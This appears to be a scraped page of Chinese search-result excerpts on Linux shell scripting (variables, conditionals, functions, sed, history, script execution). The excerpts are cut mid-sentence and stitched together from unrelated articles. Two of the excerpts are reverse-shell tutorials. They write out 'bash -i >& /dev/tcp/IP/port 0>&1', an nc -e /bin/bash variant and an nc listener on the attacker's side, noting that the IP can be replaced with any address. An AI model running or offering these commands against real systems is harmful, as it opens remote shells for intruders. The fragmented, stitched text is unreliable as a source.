之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听...,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法。...linux文件描述符:linux shell下有三种标准的文件描述符,分别如下: 0 - stdin 代表标准输入,使用<或<< 1 - stdout 代表标准输出,使用>或>> 2 - stderr...理解了上面这些知识,下面来解释一下这一条反弹shell的命令首先,bash -i代表在本地打开一个bash,然后就是/dev/tcp/ip/port, /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个...这里的-e后面跟的参数代表的是在创建连接后执行的程序,这里代表在连接到远程后可以在远程执行一个本地shell(/bin/bash),也就是反弹一个shell给远程,可以看到远程已经成功反弹到了shell
-c | sort -nr sort -nr 以阿拉伯数字倒序,小-大,带有符号的内容默认为0,排在数字后面 uniq -c 去除重复,并统计重复次数显示,不加-c只去重,不显示次数 相关文章 Linux...之cat命令 Linux之uniq命令 linux之awk使用技巧
$(var%pattern),$(var%%pattern),$(var#pattern),$(var##pattern) 1.Shell中变量的原形:${var} 但当你要显示变量值加随意的字符(我这里用...shell进行执行,{}对一串命令在当前shell执行 ()最后一个命令可以不用分号,{}最后一个命令要用分号 ()里的第一个命令和左边括号不必有空格,{}的第一个命令和左括号之间必须要有一个空格...{之间必须有空格,结束必须有; {}中的修改了$var的值 说明在当前shell执行 [root@bogon t]# { var1=test1;var2=test2;echo $var1>a;echo...var2;}>a [root@bogon t]# cat a test1 test2 脚本实例 ( echo "1" echo "2" ) | awk '{print NR,$0}' 4.几种特殊的替换结构...表示零个或一个任意字符 [...]表示匹配中括号里面的字符 [!...]
1. cmd = "some unix command" retcode = subprocess.call(cmd,shell=True) 2. ssh = paramiko.SSHClient()
什么是shell? shell是系统的用户界面,提供了用户与内核进行交互操作的一种接口(命令解释器) 。它接收用户输入的命令并把它送入内核去执行。起着用户与系统之间进行交互的作用。 ?...shell的功能: 命令行解释 命令的多种执行顺序 通配符 命令补全、别名机制、命令历史 I/O重定向 管道 命令替换(` ` 或$( ) ) shell编程语言 shell可以执行——内部命令、外部命令...shell命令分为: 内部(内置)命令 内部命令是shell本身包含的一些命令,这些内部命令的代码是整个shell代码的一个组成部分; 内部命令的执行是shell通过执行自己的代码中的相应部分来完成的...也可以通过ls命令查看这些shell的详细信息 #ls –al /bin/sh lrwxrwxrwx 1 root root 4 10月 8 2017 /bin/sh->bash Shell搜索的目录的名字都保存在一个...shell变量PATH中 ?
/bin/bash echo 'hello world' 执行: 首先给文件赋予一个可执行权限: 相对路径: 绝对路径: 或者这么执行(这种方式不需要可执行权限,不推荐):
1 变量的分类 在Linux中,变量分为环境变量 和 局部变量。 环境变量能被子进程继承,而局部变量只能在当前进程中使用。...SHELL:当前使用的SHELL HISTSIZE:历史命令的最大条数 MAIL:当前用户的邮箱目录 PATH:可执行文件的查找路径。...就会返回0;若上个命令执行失败,则该值为一个非0整数。 1.3 环境变量与局部变量的区别 环境变量相当于全局变量,它可以被子进程继承;而局部变量只能在当前shell中使用。那么,什么是子进程呢?...2.3 取消变量 unset 变量名 3 环境变量 自定义变量相当于局部变量,只能在当前shell中使用;而环境变量相当于全局变量,可以在子shell中使用。...5 变量类型:declare/typeset Linux中的变量一共有5种类型,分别是:字符、整型、只读、环境变量。
在 Linux 中有两种运行 shell 脚本的方法。你可以使用: bash script.sh 或者,你可以像这样执行 shell 脚本: ./script.sh 这可能很简单,但没太多解释。...在 Linux 中运行一个 Shell 脚本 记住,将其作为参数传递的需要是一个 shell 脚本。一个 shell 脚本是由命令组成的。如果你使用一个普通的文本文件,它将会抱怨错误的命令。...运行一个文本文件为脚本 在这种方法中,你要明确地具体指定你想使用 bash 作为脚本的解释器 。 shell 只是一个程序,并且 bash 只是 Shell 的一种实现。...为什么当你在同一个目录下,却不能使用脚本名称?这是因为你的 Linux 系统会在 PATH 环境变量中指定的几个目录中查找可执行的文件来运行。...为什么大多数 shell 脚本在其头部包含 #! /bin/bash ? 记得我提过 shell 只是一个程序,并且有 shell 程序的不同实现。 当你使用 #!
四、shell的if与c语言if的功能上的区别 shell if:0为真,接着走then。...同时由于shell里没有> 和< ,会被当作尖括号,整数条件表达式只有-ge, -gt,-le, lt。 5....因为if把$var=”yes”连读成一个变量,而此变量为空,返回1,则走else。 7.if [ $ANS ]等价于if [-n $ANS ]。如果字符串变量非空(then),空(else)。...用简化 if 和$1,$2,$3来检测参数,不合理就调用help [ -z “$1” ] &&help 如果第一个参数不存在(-z 字符串长度为0 ) [ “$1”...= “-h” ] &&help 如果第一个参数是-h,就显示help
变量是计算机编程中非常重要的一个概念。变量就是可以变化的量,与常量相反,例如一个固定的数字,字符属于常量。变量是计算机语言中能储存计算结果或能表示值的抽象概念。...定义一个变量,其实就是一种使用方便的占位符,用于引用计算机内存地址,该地址可以存储运行时可更改的程序信息。 变量需要赋值,这个值可以是一个数字,字符,也可以是更多内容。...~/08.shell $ b=2 1.2 shell 变量的引用 在 shell 中,直接使用“$”符,即可引用变量的值;一般配合 echo 命令可以打印变量的值; (base) xiehs...16:23:21 ~/08.shell $ echo $a $b 1 2 (base) xiehs 16:23:57 ~/08.shell $ echo $a 1 (base) xiehs 16:23...;else echo "no such file or dirctory";fi; #1 一个简单脚本 #/bin/bash a=$1 b=$2 if [ $a == $b ] then echo
Linux shell 1、shell的概念 1)shell是一个命令行解释器,它为用户提供了一个向linux内核发送请求以便运行程序界面的系统级程序。...用户可以通过shell来启动、挂起、停止。甚至编写一些程序。 2)它还是一个功能强大的编程语言,易编辑,易调试,灵活性强。...shell是结核性的脚本语言,在我们 shell中可以直接调用linux系统命令。...在这中间就需要一个翻译机制进行编译,就是所谓的shell编辑器, shell编辑器可以讲外层输入的asc码翻译成计算机能识别的机器语言,所以说内核要通过shell编辑器进行翻译才能对硬件进行管理...进程中的PID号,每一个进程都有一个编号 $$ 当前进程的id号 $# 当前传入shell的参数个数 $* 整体打印参数 $@ 逐个显示参数内容 $?
函数创建两种方式: function name { command; } name () { command; } 在shell中创建的variable...shell将function当做一个mini-script,因此可以用调用脚本的方式来调用函数,在函数中也可以用$1,$@等方式得到传的参数。...向function中传递array时会出现问题,需要单个传入,在函数中再包装成array,shell中的array不太好用。 函数默认的返回值是最后一条命令的exit code,可以用$?
接触过一些 shell 脚本,做服务端运维时也时常用到,是时候专门学习一下了。...This older form is compatible with the original Bourne shell (sh)....[elsecommands]fi Exit Status 退出状态,即命令执行后会给系统一个值,0-255,0 代表 success: [root@bhc004 ~]# true[root@bhc004...fi 表达式 “-f .bashprofile” 表示 .bashprofile 是一个文件,若为 true,则执行 then 后的命令;否则执行 else 后的命令。...[y/n]: "readif [ "$REPLY" = "y" ]; then lpr $TEMP_FILEficlean_up 结束一个脚本时,应清理一些文件: #!
一个系统可以存在多个shell,可以通过cat /etc/shells命令查看系统中安装的shell,不同的shell可能支持的命令语法是不相同的。 2....还是hello world程序 首先使用vim编辑器(或者是linux下任意的文本编辑器)编写文件helloshell.sh(没有必要使用.sh后缀名): #!.../helloshell.sh hello shell 通过上面的程序没有什么实际的含义,但是通过第一个shell程序了解shell程序的执行过程。 ..." else echo "what you donot like unix/linux" fi fi #!...函数 5.1 函数声明和定义 下面的程序中定义函数demo,向函数传递的所有参数表示为$*,第一个参数$1,第二个参数$2, 依次类推。 #!
bash交互界面 >:重定向 /dev/tcp:调用建立一个socket连接 127.0.0.1:可以任意更改需要反弹到的IP地址 2345:反弹到的端口 上面的是一个典型的反弹shell的语句,但是这种不能实时地在攻击机输入...,攻击机输出,只能在靶机输入东西,然后在攻击机看到 image.png 攻击机使用 nc -lvp 2200监听反弹回来地shell,然后等靶机输入东西后,攻击机才能获取到内容,攻击机不能传输命令 1.2second...bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 这种就是交互式shell了 &:标准错误输出重定向输出 0>&1:简单一点理解就是将我们在攻击机输入的命令当成靶机输入,...然后靶机返回内容时又重定向攻击机,也就是交互界面,打开了一个shell窗口,随意可以在攻击机执行命令,然后在攻击机输出结果,这么一个意思 0:标准输入 1:标准输出 2:标准错误输出 &:是为了区分标准输出和文件描述符...shell语句种,最好是有标准输入输出和标准输出
实际上Shell是一个命令解释器,它解释由用户输入的命令并且把它们送到内核。不仅如此,Shell有自己的编程语言用于对命令的编辑,它允许用户编写由shell命令组成的程序。...Linux提供了像MicrosoftWindows那样的可视的命令输入界面--X Window的图形用户界面(GUI)。...每个Linux系统的用户可以拥有他自己的用户界面或Shell,用以满足他们自己专门的Shell需要。 同Linux本身一样,Shell也有多种不同的版本。...Z Shell:The last shell you’ll ever need! Z是最后一个字母,也就是终极Shell。它集成了bash、ksh的重要特性,同时又增加了自己独有的特性。...如下图:系统中的三种shell ================================================================ 在Linux系统中,我们要查看我们当前是使用哪种
当然shell也是linux的解释器,本篇我们先来了解下这个解释器。 shell解释器 shell也叫壳,区别与操作系统内核。比如一个不同国家的人交流需要一个翻译官,那么shell就是这个翻译官。...sh也是第一个流行的shell。 csh C shell 语法和C语言比较类似。 ksh 集合了 csh 和 sh 的优点,并且和sh兼容。...bash 与sh完全兼容,sh的的扩展版本,在sh上增加了新特性,补全命令,命令编辑器和历史命令等功能也是linux默认的shell。...linux默认的shell解释器 linux 默认的 shell 解释器是bash,在/bin目录下。.../hello.sh 执行hello.sh 另外也可以用以下几种方式执行(可以没有可执行权限) 编写一个新的脚本,不添加可执行权限。 ➜ test bash t.sh bash!
# Linux Shell编程 # 为什么要学习Shell编程 Linux运维工程师在进行服务器集群管理时,需要编写Shell程序来进行服务器管理。...对于大数据程序员来说,需要编写Shell程序来管理集群 # Shell是什么 Shell是一个命令行解释器,它为用户提供了一个向Linux内核发送请求以便运行程序的界面系统级程序,用户可以用Shell来启动...看一个示意图 # Shell脚本的执行方式 # 脚本格式要求 脚本以#!.../bin/bash开头 脚本需要有可执行权限 # 编写第一个Shell脚本 需求说明:创建一个Shell脚本,输出hello world! vim hello.sh #!...的变量 # Shell变量介绍 Linux Shell中的变量分为,系统变量和用户自定义变量。
sed -i ‘s/abc/xxx/g’ file abc修改前的字符串 xxx是修改后的字符串 file是要被修改的文件 例如: 我有一个文件是map_server #!
由于历史命令在账户注销时才会被写入文件,因此最后一个账号注销时才算当前账户注销;因此,历史文件中只会记录最后一个注销账户的命令。...5.2 login shell与non-login shell的区别? login shell和non-login shell是两种shell登录的方式,它们登录后加载的环境配置文件有所不同。...5.2.2 non-login shell 获取bash不需要输入密码的登录过程称为non-login shell。...如在bash中直接输入bash,从而打开一个子bash,这个过程不需要输入密码,因此称为non-login shell。...代表一个字符 [] [abcd]:代表该范围内的一个字符 [-] [a-z]:代表a-z之间的一个字符 [^] [^a-z]:代表除了a-z以外的所有字符 6.2 特殊字符 符号 含义 # 注释 \
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
